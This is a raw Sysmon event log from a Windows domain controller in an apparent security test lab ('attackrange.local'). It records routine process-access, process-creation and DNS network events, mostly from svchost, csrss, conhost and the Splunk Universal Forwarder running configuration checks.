12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-64EE-6064-D600-00000000AE01}65685492C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000008131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.070{266CAFBE-64EE-6064-D700-00000000AE01}65925340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D700-00000000AE01}6592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.055{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.055{266CAFBE-64ED-6064-D500-00000000AE01}56485324C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.064{266CAFBE-64EE-6064-D600-00000000AE01}6568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000008289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.941{266CAFBE-64EF-6064-EA00-00000000AE01}66726668C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.870{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61931- 354300x80000000000000008287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.870{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54324- 10341000x80000000000000008286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.676{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EF-6064-E900-00000000AE01}24882468C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.683{266CAFBE-64EF-6064-EA00-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000008278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.676{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.676{266CAFBE-64EF-6064-E900-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 